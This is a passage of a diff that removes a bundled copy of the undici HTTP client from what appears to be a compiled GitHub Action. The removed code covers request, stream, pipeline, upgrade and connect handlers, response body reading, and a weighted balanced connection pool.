null - self[kListener] = null - - if (!signal) { - return - } - - if (signal.aborted) { - abort(self) - return - } - - self[kSignal] = signal - self[kListener] = () => { - abort(self) - } - - addAbortListener(self[kSignal], self[kListener]) -} - -function removeSignal (self) { - if (!self[kSignal]) { - return - } - - if ('removeEventListener' in self[kSignal]) { - self[kSignal].removeEventListener('abort', self[kListener]) - } else { - self[kSignal].removeListener('abort', self[kListener]) - } - - 
self[kSignal] = null - self[kListener] = null -} - -module.exports = { - addSignal, - removeSignal -} - - -/***/ }), - -/***/ 9744: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { AsyncResource } = __nccwpck_require__(852) -const { InvalidArgumentError, RequestAbortedError, SocketError } = __nccwpck_require__(8045) -const util = __nccwpck_require__(3983) -const { addSignal, removeSignal } = __nccwpck_require__(7032) - -class ConnectHandler extends AsyncResource { - constructor (opts, callback) { - if (!opts || typeof opts !== 'object') { - throw new InvalidArgumentError('invalid opts') - } - - if (typeof callback !== 'function') { - throw new InvalidArgumentError('invalid callback') - } - - const { signal, opaque, responseHeaders } = opts - - if (signal && typeof signal.on !== 'function' && typeof signal.addEventListener !== 'function') { - throw new InvalidArgumentError('signal must be an EventEmitter or EventTarget') - } - - super('UNDICI_CONNECT') - - this.opaque = opaque || null - this.responseHeaders = responseHeaders || null - this.callback = callback - this.abort = null - - addSignal(this, signal) - } - - onConnect (abort, context) { - if (!this.callback) { - throw new RequestAbortedError() - } - - this.abort = abort - this.context = context - } - - onHeaders () { - throw new SocketError('bad connect', null) - } - - onUpgrade (statusCode, rawHeaders, socket) { - const { callback, opaque, context } = this - - removeSignal(this) - - this.callback = null - - let headers = rawHeaders - // Indicates is an HTTP2Session - if (headers != null) { - headers = this.responseHeaders === 'raw' ? 
util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) - } - - this.runInAsyncScope(callback, null, null, { - statusCode, - headers, - socket, - opaque, - context - }) - } - - onError (err) { - const { callback, opaque } = this - - removeSignal(this) - - if (callback) { - this.callback = null - queueMicrotask(() => { - this.runInAsyncScope(callback, null, err, { opaque }) - }) - } - } -} - -function connect (opts, callback) { - if (callback === undefined) { - return new Promise((resolve, reject) => { - connect.call(this, opts, (err, data) => { - return err ? reject(err) : resolve(data) - }) - }) - } - - try { - const connectHandler = new ConnectHandler(opts, callback) - this.dispatch({ ...opts, method: 'CONNECT' }, connectHandler) - } catch (err) { - if (typeof callback !== 'function') { - throw err - } - const opaque = opts && opts.opaque - queueMicrotask(() => callback(err, { opaque })) - } -} - -module.exports = connect - - -/***/ }), - -/***/ 8752: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { - Readable, - Duplex, - PassThrough -} = __nccwpck_require__(2781) -const { - InvalidArgumentError, - InvalidReturnValueError, - RequestAbortedError -} = __nccwpck_require__(8045) -const util = __nccwpck_require__(3983) -const { AsyncResource } = __nccwpck_require__(852) -const { addSignal, removeSignal } = __nccwpck_require__(7032) -const assert = __nccwpck_require__(9491) - -const kResume = Symbol('resume') - -class PipelineRequest extends Readable { - constructor () { - super({ autoDestroy: true }) - - this[kResume] = null - } - - _read () { - const { [kResume]: resume } = this - - if (resume) { - this[kResume] = null - resume() - } - } - - _destroy (err, callback) { - this._read() - - callback(err) - } -} - -class PipelineResponse extends Readable { - constructor (resume) { - super({ autoDestroy: true }) - this[kResume] = resume - } - - _read () { - this[kResume]() - } - - _destroy (err, callback) { - if 
(!err && !this._readableState.endEmitted) { - err = new RequestAbortedError() - } - - callback(err) - } -} - -class PipelineHandler extends AsyncResource { - constructor (opts, handler) { - if (!opts || typeof opts !== 'object') { - throw new InvalidArgumentError('invalid opts') - } - - if (typeof handler !== 'function') { - throw new InvalidArgumentError('invalid handler') - } - - const { signal, method, opaque, onInfo, responseHeaders } = opts - - if (signal && typeof signal.on !== 'function' && typeof signal.addEventListener !== 'function') { - throw new InvalidArgumentError('signal must be an EventEmitter or EventTarget') - } - - if (method === 'CONNECT') { - throw new InvalidArgumentError('invalid method') - } - - if (onInfo && typeof onInfo !== 'function') { - throw new InvalidArgumentError('invalid onInfo callback') - } - - super('UNDICI_PIPELINE') - - this.opaque = opaque || null - this.responseHeaders = responseHeaders || null - this.handler = handler - this.abort = null - this.context = null - this.onInfo = onInfo || null - - this.req = new PipelineRequest().on('error', util.nop) - - this.ret = new Duplex({ - readableObjectMode: opts.objectMode, - autoDestroy: true, - read: () => { - const { body } = this - - if (body && body.resume) { - body.resume() - } - }, - write: (chunk, encoding, callback) => { - const { req } = this - - if (req.push(chunk, encoding) || req._readableState.destroyed) { - callback() - } else { - req[kResume] = callback - } - }, - destroy: (err, callback) => { - const { body, req, res, ret, abort } = this - - if (!err && !ret._readableState.endEmitted) { - err = new RequestAbortedError() - } - - if (abort && err) { - abort() - } - - util.destroy(body, err) - util.destroy(req, err) - util.destroy(res, err) - - removeSignal(this) - - callback(err) - } - }).on('prefinish', () => { - const { req } = this - - // Node < 15 does not call _final in same tick. 
- req.push(null) - }) - - this.res = null - - addSignal(this, signal) - } - - onConnect (abort, context) { - const { ret, res } = this - - assert(!res, 'pipeline cannot be retried') - - if (ret.destroyed) { - throw new RequestAbortedError() - } - - this.abort = abort - this.context = context - } - - onHeaders (statusCode, rawHeaders, resume) { - const { opaque, handler, context } = this - - if (statusCode < 200) { - if (this.onInfo) { - const headers = this.responseHeaders === 'raw' ? util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) - this.onInfo({ statusCode, headers }) - } - return - } - - this.res = new PipelineResponse(resume) - - let body - try { - this.handler = null - const headers = this.responseHeaders === 'raw' ? util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) - body = this.runInAsyncScope(handler, null, { - statusCode, - headers, - opaque, - body: this.res, - context - }) - } catch (err) { - this.res.on('error', util.nop) - throw err - } - - if (!body || typeof body.on !== 'function') { - throw new InvalidReturnValueError('expected Readable') - } - - body - .on('data', (chunk) => { - const { ret, body } = this - - if (!ret.push(chunk) && body.pause) { - body.pause() - } - }) - .on('error', (err) => { - const { ret } = this - - util.destroy(ret, err) - }) - .on('end', () => { - const { ret } = this - - ret.push(null) - }) - .on('close', () => { - const { ret } = this - - if (!ret._readableState.ended) { - util.destroy(ret, new RequestAbortedError()) - } - }) - - this.body = body - } - - onData (chunk) { - const { res } = this - return res.push(chunk) - } - - onComplete (trailers) { - const { res } = this - res.push(null) - } - - onError (err) { - const { ret } = this - this.handler = null - util.destroy(ret, err) - } -} - -function pipeline (opts, handler) { - try { - const pipelineHandler = new PipelineHandler(opts, handler) - this.dispatch({ ...opts, body: pipelineHandler.req }, pipelineHandler) - return 
pipelineHandler.ret - } catch (err) { - return new PassThrough().destroy(err) - } -} - -module.exports = pipeline - - -/***/ }), - -/***/ 5448: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const Readable = __nccwpck_require__(3858) -const { - InvalidArgumentError, - RequestAbortedError -} = __nccwpck_require__(8045) -const util = __nccwpck_require__(3983) -const { getResolveErrorBodyCallback } = __nccwpck_require__(7474) -const { AsyncResource } = __nccwpck_require__(852) -const { addSignal, removeSignal } = __nccwpck_require__(7032) - -class RequestHandler extends AsyncResource { - constructor (opts, callback) { - if (!opts || typeof opts !== 'object') { - throw new InvalidArgumentError('invalid opts') - } - - const { signal, method, opaque, body, onInfo, responseHeaders, throwOnError, highWaterMark } = opts - - try { - if (typeof callback !== 'function') { - throw new InvalidArgumentError('invalid callback') - } - - if (highWaterMark && (typeof highWaterMark !== 'number' || highWaterMark < 0)) { - throw new InvalidArgumentError('invalid highWaterMark') - } - - if (signal && typeof signal.on !== 'function' && typeof signal.addEventListener !== 'function') { - throw new InvalidArgumentError('signal must be an EventEmitter or EventTarget') - } - - if (method === 'CONNECT') { - throw new InvalidArgumentError('invalid method') - } - - if (onInfo && typeof onInfo !== 'function') { - throw new InvalidArgumentError('invalid onInfo callback') - } - - super('UNDICI_REQUEST') - } catch (err) { - if (util.isStream(body)) { - util.destroy(body.on('error', util.nop), err) - } - throw err - } - - this.responseHeaders = responseHeaders || null - this.opaque = opaque || null - this.callback = callback - this.res = null - this.abort = null - this.body = body - this.trailers = {} - this.context = null - this.onInfo = onInfo || null - this.throwOnError = throwOnError - this.highWaterMark = highWaterMark - - if (util.isStream(body)) { - 
body.on('error', (err) => { - this.onError(err) - }) - } - - addSignal(this, signal) - } - - onConnect (abort, context) { - if (!this.callback) { - throw new RequestAbortedError() - } - - this.abort = abort - this.context = context - } - - onHeaders (statusCode, rawHeaders, resume, statusMessage) { - const { callback, opaque, abort, context, responseHeaders, highWaterMark } = this - - const headers = responseHeaders === 'raw' ? util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) - - if (statusCode < 200) { - if (this.onInfo) { - this.onInfo({ statusCode, headers }) - } - return - } - - const parsedHeaders = responseHeaders === 'raw' ? util.parseHeaders(rawHeaders) : headers - const contentType = parsedHeaders['content-type'] - const body = new Readable({ resume, abort, contentType, highWaterMark }) - - this.callback = null - this.res = body - if (callback !== null) { - if (this.throwOnError && statusCode >= 400) { - this.runInAsyncScope(getResolveErrorBodyCallback, null, - { callback, body, contentType, statusCode, statusMessage, headers } - ) - } else { - this.runInAsyncScope(callback, null, null, { - statusCode, - headers, - trailers: this.trailers, - opaque, - body, - context - }) - } - } - } - - onData (chunk) { - const { res } = this - return res.push(chunk) - } - - onComplete (trailers) { - const { res } = this - - removeSignal(this) - - util.parseHeaders(trailers, this.trailers) - - res.push(null) - } - - onError (err) { - const { res, callback, body, opaque } = this - - removeSignal(this) - - if (callback) { - // TODO: Does this need queueMicrotask? - this.callback = null - queueMicrotask(() => { - this.runInAsyncScope(callback, null, err, { opaque }) - }) - } - - if (res) { - this.res = null - // Ensure all queued handlers are invoked before destroying res. 
- queueMicrotask(() => { - util.destroy(res, err) - }) - } - - if (body) { - this.body = null - util.destroy(body, err) - } - } -} - -function request (opts, callback) { - if (callback === undefined) { - return new Promise((resolve, reject) => { - request.call(this, opts, (err, data) => { - return err ? reject(err) : resolve(data) - }) - }) - } - - try { - this.dispatch(opts, new RequestHandler(opts, callback)) - } catch (err) { - if (typeof callback !== 'function') { - throw err - } - const opaque = opts && opts.opaque - queueMicrotask(() => callback(err, { opaque })) - } -} - -module.exports = request -module.exports.RequestHandler = RequestHandler - - -/***/ }), - -/***/ 5395: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { finished, PassThrough } = __nccwpck_require__(2781) -const { - InvalidArgumentError, - InvalidReturnValueError, - RequestAbortedError -} = __nccwpck_require__(8045) -const util = __nccwpck_require__(3983) -const { getResolveErrorBodyCallback } = __nccwpck_require__(7474) -const { AsyncResource } = __nccwpck_require__(852) -const { addSignal, removeSignal } = __nccwpck_require__(7032) - -class StreamHandler extends AsyncResource { - constructor (opts, factory, callback) { - if (!opts || typeof opts !== 'object') { - throw new InvalidArgumentError('invalid opts') - } - - const { signal, method, opaque, body, onInfo, responseHeaders, throwOnError } = opts - - try { - if (typeof callback !== 'function') { - throw new InvalidArgumentError('invalid callback') - } - - if (typeof factory !== 'function') { - throw new InvalidArgumentError('invalid factory') - } - - if (signal && typeof signal.on !== 'function' && typeof signal.addEventListener !== 'function') { - throw new InvalidArgumentError('signal must be an EventEmitter or EventTarget') - } - - if (method === 'CONNECT') { - throw new InvalidArgumentError('invalid method') - } - - if (onInfo && typeof onInfo !== 'function') { - throw new 
InvalidArgumentError('invalid onInfo callback') - } - - super('UNDICI_STREAM') - } catch (err) { - if (util.isStream(body)) { - util.destroy(body.on('error', util.nop), err) - } - throw err - } - - this.responseHeaders = responseHeaders || null - this.opaque = opaque || null - this.factory = factory - this.callback = callback - this.res = null - this.abort = null - this.context = null - this.trailers = null - this.body = body - this.onInfo = onInfo || null - this.throwOnError = throwOnError || false - - if (util.isStream(body)) { - body.on('error', (err) => { - this.onError(err) - }) - } - - addSignal(this, signal) - } - - onConnect (abort, context) { - if (!this.callback) { - throw new RequestAbortedError() - } - - this.abort = abort - this.context = context - } - - onHeaders (statusCode, rawHeaders, resume, statusMessage) { - const { factory, opaque, context, callback, responseHeaders } = this - - const headers = responseHeaders === 'raw' ? util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) - - if (statusCode < 200) { - if (this.onInfo) { - this.onInfo({ statusCode, headers }) - } - return - } - - this.factory = null - - let res - - if (this.throwOnError && statusCode >= 400) { - const parsedHeaders = responseHeaders === 'raw' ? util.parseHeaders(rawHeaders) : headers - const contentType = parsedHeaders['content-type'] - res = new PassThrough() - - this.callback = null - this.runInAsyncScope(getResolveErrorBodyCallback, null, - { callback, body: res, contentType, statusCode, statusMessage, headers } - ) - } else { - if (factory === null) { - return - } - - res = this.runInAsyncScope(factory, null, { - statusCode, - headers, - opaque, - context - }) - - if ( - !res || - typeof res.write !== 'function' || - typeof res.end !== 'function' || - typeof res.on !== 'function' - ) { - throw new InvalidReturnValueError('expected Writable') - } - - // TODO: Avoid finished. It registers an unnecessary amount of listeners. 
- finished(res, { readable: false }, (err) => { - const { callback, res, opaque, trailers, abort } = this - - this.res = null - if (err || !res.readable) { - util.destroy(res, err) - } - - this.callback = null - this.runInAsyncScope(callback, null, err || null, { opaque, trailers }) - - if (err) { - abort() - } - }) - } - - res.on('drain', resume) - - this.res = res - - const needDrain = res.writableNeedDrain !== undefined - ? res.writableNeedDrain - : res._writableState && res._writableState.needDrain - - return needDrain !== true - } - - onData (chunk) { - const { res } = this - - return res ? res.write(chunk) : true - } - - onComplete (trailers) { - const { res } = this - - removeSignal(this) - - if (!res) { - return - } - - this.trailers = util.parseHeaders(trailers) - - res.end() - } - - onError (err) { - const { res, callback, opaque, body } = this - - removeSignal(this) - - this.factory = null - - if (res) { - this.res = null - util.destroy(res, err) - } else if (callback) { - this.callback = null - queueMicrotask(() => { - this.runInAsyncScope(callback, null, err, { opaque }) - }) - } - - if (body) { - this.body = null - util.destroy(body, err) - } - } -} - -function stream (opts, factory, callback) { - if (callback === undefined) { - return new Promise((resolve, reject) => { - stream.call(this, opts, factory, (err, data) => { - return err ? 
reject(err) : resolve(data) - }) - }) - } - - try { - this.dispatch(opts, new StreamHandler(opts, factory, callback)) - } catch (err) { - if (typeof callback !== 'function') { - throw err - } - const opaque = opts && opts.opaque - queueMicrotask(() => callback(err, { opaque })) - } -} - -module.exports = stream - - -/***/ }), - -/***/ 6923: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { InvalidArgumentError, RequestAbortedError, SocketError } = __nccwpck_require__(8045) -const { AsyncResource } = __nccwpck_require__(852) -const util = __nccwpck_require__(3983) -const { addSignal, removeSignal } = __nccwpck_require__(7032) -const assert = __nccwpck_require__(9491) - -class UpgradeHandler extends AsyncResource { - constructor (opts, callback) { - if (!opts || typeof opts !== 'object') { - throw new InvalidArgumentError('invalid opts') - } - - if (typeof callback !== 'function') { - throw new InvalidArgumentError('invalid callback') - } - - const { signal, opaque, responseHeaders } = opts - - if (signal && typeof signal.on !== 'function' && typeof signal.addEventListener !== 'function') { - throw new InvalidArgumentError('signal must be an EventEmitter or EventTarget') - } - - super('UNDICI_UPGRADE') - - this.responseHeaders = responseHeaders || null - this.opaque = opaque || null - this.callback = callback - this.abort = null - this.context = null - - addSignal(this, signal) - } - - onConnect (abort, context) { - if (!this.callback) { - throw new RequestAbortedError() - } - - this.abort = abort - this.context = null - } - - onHeaders () { - throw new SocketError('bad upgrade', null) - } - - onUpgrade (statusCode, rawHeaders, socket) { - const { callback, opaque, context } = this - - assert.strictEqual(statusCode, 101) - - removeSignal(this) - - this.callback = null - const headers = this.responseHeaders === 'raw' ? 
util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) - this.runInAsyncScope(callback, null, null, { - headers, - socket, - opaque, - context - }) - } - - onError (err) { - const { callback, opaque } = this - - removeSignal(this) - - if (callback) { - this.callback = null - queueMicrotask(() => { - this.runInAsyncScope(callback, null, err, { opaque }) - }) - } - } -} - -function upgrade (opts, callback) { - if (callback === undefined) { - return new Promise((resolve, reject) => { - upgrade.call(this, opts, (err, data) => { - return err ? reject(err) : resolve(data) - }) - }) - } - - try { - const upgradeHandler = new UpgradeHandler(opts, callback) - this.dispatch({ - ...opts, - method: opts.method || 'GET', - upgrade: opts.protocol || 'Websocket' - }, upgradeHandler) - } catch (err) { - if (typeof callback !== 'function') { - throw err - } - const opaque = opts && opts.opaque - queueMicrotask(() => callback(err, { opaque })) - } -} - -module.exports = upgrade - - -/***/ }), - -/***/ 4059: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -module.exports.request = __nccwpck_require__(5448) -module.exports.stream = __nccwpck_require__(5395) -module.exports.pipeline = __nccwpck_require__(8752) -module.exports.upgrade = __nccwpck_require__(6923) -module.exports.connect = __nccwpck_require__(9744) - - -/***/ }), - -/***/ 3858: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; -// Ported from https://github.com/nodejs/undici/pull/907 - - - -const assert = __nccwpck_require__(9491) -const { Readable } = __nccwpck_require__(2781) -const { RequestAbortedError, NotSupportedError, InvalidArgumentError } = __nccwpck_require__(8045) -const util = __nccwpck_require__(3983) -const { ReadableStreamFrom, toUSVString } = __nccwpck_require__(3983) - -let Blob - -const kConsume = Symbol('kConsume') -const kReading = Symbol('kReading') -const kBody = Symbol('kBody') -const kAbort = Symbol('abort') 
-const kContentType = Symbol('kContentType') - -const noop = () => {} - -module.exports = class BodyReadable extends Readable { - constructor ({ - resume, - abort, - contentType = '', - highWaterMark = 64 * 1024 // Same as nodejs fs streams. - }) { - super({ - autoDestroy: true, - read: resume, - highWaterMark - }) - - this._readableState.dataEmitted = false - - this[kAbort] = abort - this[kConsume] = null - this[kBody] = null - this[kContentType] = contentType - - // Is stream being consumed through Readable API? - // This is an optimization so that we avoid checking - // for 'data' and 'readable' listeners in the hot path - // inside push(). - this[kReading] = false - } - - destroy (err) { - if (this.destroyed) { - // Node < 16 - return this - } - - if (!err && !this._readableState.endEmitted) { - err = new RequestAbortedError() - } - - if (err) { - this[kAbort]() - } - - return super.destroy(err) - } - - emit (ev, ...args) { - if (ev === 'data') { - // Node < 16.7 - this._readableState.dataEmitted = true - } else if (ev === 'error') { - // Node < 16 - this._readableState.errorEmitted = true - } - return super.emit(ev, ...args) - } - - on (ev, ...args) { - if (ev === 'data' || ev === 'readable') { - this[kReading] = true - } - return super.on(ev, ...args) - } - - addListener (ev, ...args) { - return this.on(ev, ...args) - } - - off (ev, ...args) { - const ret = super.off(ev, ...args) - if (ev === 'data' || ev === 'readable') { - this[kReading] = ( - this.listenerCount('data') > 0 || - this.listenerCount('readable') > 0 - ) - } - return ret - } - - removeListener (ev, ...args) { - return this.off(ev, ...args) - } - - push (chunk) { - if (this[kConsume] && chunk !== null && this.readableLength === 0) { - consumePush(this[kConsume], chunk) - return this[kReading] ? 
super.push(chunk) : true - } - return super.push(chunk) - } - - // https://fetch.spec.whatwg.org/#dom-body-text - async text () { - return consume(this, 'text') - } - - // https://fetch.spec.whatwg.org/#dom-body-json - async json () { - return consume(this, 'json') - } - - // https://fetch.spec.whatwg.org/#dom-body-blob - async blob () { - return consume(this, 'blob') - } - - // https://fetch.spec.whatwg.org/#dom-body-arraybuffer - async arrayBuffer () { - return consume(this, 'arrayBuffer') - } - - // https://fetch.spec.whatwg.org/#dom-body-formdata - async formData () { - // TODO: Implement. - throw new NotSupportedError() - } - - // https://fetch.spec.whatwg.org/#dom-body-bodyused - get bodyUsed () { - return util.isDisturbed(this) - } - - // https://fetch.spec.whatwg.org/#dom-body-body - get body () { - if (!this[kBody]) { - this[kBody] = ReadableStreamFrom(this) - if (this[kConsume]) { - // TODO: Is this the best way to force a lock? - this[kBody].getReader() // Ensure stream is locked. - assert(this[kBody].locked) - } - } - return this[kBody] - } - - dump (opts) { - let limit = opts && Number.isFinite(opts.limit) ? opts.limit : 262144 - const signal = opts && opts.signal - - if (signal) { - try { - if (typeof signal !== 'object' || !('aborted' in signal)) { - throw new InvalidArgumentError('signal must be an AbortSignal') - } - util.throwIfAborted(signal) - } catch (err) { - return Promise.reject(err) - } - } - - if (this.closed) { - return Promise.resolve(null) - } - - return new Promise((resolve, reject) => { - const signalListenerCleanup = signal - ? 
util.addAbortListener(signal, () => { - this.destroy() - }) - : noop - - this - .on('close', function () { - signalListenerCleanup() - if (signal && signal.aborted) { - reject(signal.reason || Object.assign(new Error('The operation was aborted'), { name: 'AbortError' })) - } else { - resolve(null) - } - }) - .on('error', noop) - .on('data', function (chunk) { - limit -= chunk.length - if (limit <= 0) { - this.destroy() - } - }) - .resume() - }) - } -} - -// https://streams.spec.whatwg.org/#readablestream-locked -function isLocked (self) { - // Consume is an implicit lock. - return (self[kBody] && self[kBody].locked === true) || self[kConsume] -} - -// https://fetch.spec.whatwg.org/#body-unusable -function isUnusable (self) { - return util.isDisturbed(self) || isLocked(self) -} - -async function consume (stream, type) { - if (isUnusable(stream)) { - throw new TypeError('unusable') - } - - assert(!stream[kConsume]) - - return new Promise((resolve, reject) => { - stream[kConsume] = { - type, - stream, - resolve, - reject, - length: 0, - body: [] - } - - stream - .on('error', function (err) { - consumeFinish(this[kConsume], err) - }) - .on('close', function () { - if (this[kConsume].body !== null) { - consumeFinish(this[kConsume], new RequestAbortedError()) - } - }) - - process.nextTick(consumeStart, stream[kConsume]) - }) -} - -function consumeStart (consume) { - if (consume.body === null) { - return - } - - const { _readableState: state } = consume.stream - - for (const chunk of state.buffer) { - consumePush(consume, chunk) - } - - if (state.endEmitted) { - consumeEnd(this[kConsume]) - } else { - consume.stream.on('end', function () { - consumeEnd(this[kConsume]) - }) - } - - consume.stream.resume() - - while (consume.stream.read() != null) { - // Loop - } -} - -function consumeEnd (consume) { - const { type, body, resolve, stream, length } = consume - - try { - if (type === 'text') { - resolve(toUSVString(Buffer.concat(body))) - } else if (type === 'json') { - 
resolve(JSON.parse(Buffer.concat(body))) - } else if (type === 'arrayBuffer') { - const dst = new Uint8Array(length) - - let pos = 0 - for (const buf of body) { - dst.set(buf, pos) - pos += buf.byteLength - } - - resolve(dst.buffer) - } else if (type === 'blob') { - if (!Blob) { - Blob = (__nccwpck_require__(4300).Blob) - } - resolve(new Blob(body, { type: stream[kContentType] })) - } - - consumeFinish(consume) - } catch (err) { - stream.destroy(err) - } -} - -function consumePush (consume, chunk) { - consume.length += chunk.length - consume.body.push(chunk) -} - -function consumeFinish (consume, err) { - if (consume.body === null) { - return - } - - if (err) { - consume.reject(err) - } else { - consume.resolve() - } - - consume.type = null - consume.stream = null - consume.resolve = null - consume.reject = null - consume.length = 0 - consume.body = null -} - - -/***/ }), - -/***/ 7474: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -const assert = __nccwpck_require__(9491) -const { - ResponseStatusCodeError -} = __nccwpck_require__(8045) -const { toUSVString } = __nccwpck_require__(3983) - -async function getResolveErrorBodyCallback ({ callback, body, contentType, statusCode, statusMessage, headers }) { - assert(body) - - let chunks = [] - let limit = 0 - - for await (const chunk of body) { - chunks.push(chunk) - limit += chunk.length - if (limit > 128 * 1024) { - chunks = null - break - } - } - - if (statusCode === 204 || !contentType || !chunks) { - process.nextTick(callback, new ResponseStatusCodeError(`Response status code ${statusCode}${statusMessage ? `: ${statusMessage}` : ''}`, statusCode, headers)) - return - } - - try { - if (contentType.startsWith('application/json')) { - const payload = JSON.parse(toUSVString(Buffer.concat(chunks))) - process.nextTick(callback, new ResponseStatusCodeError(`Response status code ${statusCode}${statusMessage ? 
`: ${statusMessage}` : ''}`, statusCode, headers, payload)) - return - } - - if (contentType.startsWith('text/')) { - const payload = toUSVString(Buffer.concat(chunks)) - process.nextTick(callback, new ResponseStatusCodeError(`Response status code ${statusCode}${statusMessage ? `: ${statusMessage}` : ''}`, statusCode, headers, payload)) - return - } - } catch (err) { - // Process in a fallback if error - } - - process.nextTick(callback, new ResponseStatusCodeError(`Response status code ${statusCode}${statusMessage ? `: ${statusMessage}` : ''}`, statusCode, headers)) -} - -module.exports = { getResolveErrorBodyCallback } - - -/***/ }), - -/***/ 7931: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { - BalancedPoolMissingUpstreamError, - InvalidArgumentError -} = __nccwpck_require__(8045) -const { - PoolBase, - kClients, - kNeedDrain, - kAddClient, - kRemoveClient, - kGetDispatcher -} = __nccwpck_require__(3198) -const Pool = __nccwpck_require__(4634) -const { kUrl, kInterceptors } = __nccwpck_require__(2785) -const { parseOrigin } = __nccwpck_require__(3983) -const kFactory = Symbol('factory') - -const kOptions = Symbol('options') -const kGreatestCommonDivisor = Symbol('kGreatestCommonDivisor') -const kCurrentWeight = Symbol('kCurrentWeight') -const kIndex = Symbol('kIndex') -const kWeight = Symbol('kWeight') -const kMaxWeightPerServer = Symbol('kMaxWeightPerServer') -const kErrorPenalty = Symbol('kErrorPenalty') - -function getGreatestCommonDivisor (a, b) { - if (b === 0) return a - return getGreatestCommonDivisor(b, a % b) -} - -function defaultFactory (origin, opts) { - return new Pool(origin, opts) -} - -class BalancedPool extends PoolBase { - constructor (upstreams = [], { factory = defaultFactory, ...opts } = {}) { - super() - - this[kOptions] = opts - this[kIndex] = -1 - this[kCurrentWeight] = 0 - - this[kMaxWeightPerServer] = this[kOptions].maxWeightPerServer || 100 - this[kErrorPenalty] = 
this[kOptions].errorPenalty || 15 - - if (!Array.isArray(upstreams)) { - upstreams = [upstreams] - } - - if (typeof factory !== 'function') { - throw new InvalidArgumentError('factory must be a function.') - } - - this[kInterceptors] = opts.interceptors && opts.interceptors.BalancedPool && Array.isArray(opts.interceptors.BalancedPool) - ? opts.interceptors.BalancedPool - : [] - this[kFactory] = factory - - for (const upstream of upstreams) { - this.addUpstream(upstream) - } - this._updateBalancedPoolStats() - } - - addUpstream (upstream) { - const upstreamOrigin = parseOrigin(upstream).origin - - if (this[kClients].find((pool) => ( - pool[kUrl].origin === upstreamOrigin && - pool.closed !== true && - pool.destroyed !== true - ))) { - return this - } - const pool = this[kFactory](upstreamOrigin, Object.assign({}, this[kOptions])) - - this[kAddClient](pool) - pool.on('connect', () => { - pool[kWeight] = Math.min(this[kMaxWeightPerServer], pool[kWeight] + this[kErrorPenalty]) - }) - - pool.on('connectionError', () => { - pool[kWeight] = Math.max(1, pool[kWeight] - this[kErrorPenalty]) - this._updateBalancedPoolStats() - }) - - pool.on('disconnect', (...args) => { - const err = args[2] - if (err && err.code === 'UND_ERR_SOCKET') { - // decrease the weight of the pool. 
- pool[kWeight] = Math.max(1, pool[kWeight] - this[kErrorPenalty]) - this._updateBalancedPoolStats() - } - }) - - for (const client of this[kClients]) { - client[kWeight] = this[kMaxWeightPerServer] - } - - this._updateBalancedPoolStats() - - return this - } - - _updateBalancedPoolStats () { - this[kGreatestCommonDivisor] = this[kClients].map(p => p[kWeight]).reduce(getGreatestCommonDivisor, 0) - } - - removeUpstream (upstream) { - const upstreamOrigin = parseOrigin(upstream).origin - - const pool = this[kClients].find((pool) => ( - pool[kUrl].origin === upstreamOrigin && - pool.closed !== true && - pool.destroyed !== true - )) - - if (pool) { - this[kRemoveClient](pool) - } - - return this - } - - get upstreams () { - return this[kClients] - .filter(dispatcher => dispatcher.closed !== true && dispatcher.destroyed !== true) - .map((p) => p[kUrl].origin) - } - - [kGetDispatcher] () { - // We validate that pools is greater than 0, - // otherwise we would have to wait until an upstream - // is added, which might never happen. - if (this[kClients].length === 0) { - throw new BalancedPoolMissingUpstreamError() - } - - const dispatcher = this[kClients].find(dispatcher => ( - !dispatcher[kNeedDrain] && - dispatcher.closed !== true && - dispatcher.destroyed !== true - )) - - if (!dispatcher) { - return - } - - const allClientsBusy = this[kClients].map(pool => pool[kNeedDrain]).reduce((a, b) => a && b, true) - - if (allClientsBusy) { - return - } - - let counter = 0 - - let maxWeightIndex = this[kClients].findIndex(pool => !pool[kNeedDrain]) - - while (counter++ < this[kClients].length) { - this[kIndex] = (this[kIndex] + 1) % this[kClients].length - const pool = this[kClients][this[kIndex]] - - // find pool index with the largest weight - if (pool[kWeight] > this[kClients][maxWeightIndex][kWeight] && !pool[kNeedDrain]) { - maxWeightIndex = this[kIndex] - } - - // decrease the current weight every `this[kClients].length`. 
- if (this[kIndex] === 0) { - // Set the current weight to the next lower weight. - this[kCurrentWeight] = this[kCurrentWeight] - this[kGreatestCommonDivisor] - - if (this[kCurrentWeight] <= 0) { - this[kCurrentWeight] = this[kMaxWeightPerServer] - } - } - if (pool[kWeight] >= this[kCurrentWeight] && (!pool[kNeedDrain])) { - return pool - } - } - - this[kCurrentWeight] = this[kClients][maxWeightIndex][kWeight] - this[kIndex] = maxWeightIndex - return this[kClients][maxWeightIndex] - } -} - -module.exports = BalancedPool - - -/***/ }), - -/***/ 6101: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { kConstruct } = __nccwpck_require__(9174) -const { urlEquals, fieldValues: getFieldValues } = __nccwpck_require__(2396) -const { kEnumerableProperty, isDisturbed } = __nccwpck_require__(3983) -const { kHeadersList } = __nccwpck_require__(2785) -const { webidl } = __nccwpck_require__(1744) -const { Response, cloneResponse } = __nccwpck_require__(7823) -const { Request } = __nccwpck_require__(8359) -const { kState, kHeaders, kGuard, kRealm } = __nccwpck_require__(5861) -const { fetching } = __nccwpck_require__(4881) -const { urlIsHttpHttpsScheme, createDeferredPromise, readAllBytes } = __nccwpck_require__(2538) -const assert = __nccwpck_require__(9491) -const { getGlobalDispatcher } = __nccwpck_require__(1892) - -/** - * @see https://w3c.github.io/ServiceWorker/#dfn-cache-batch-operation - * @typedef {Object} CacheBatchOperation - * @property {'delete' | 'put'} 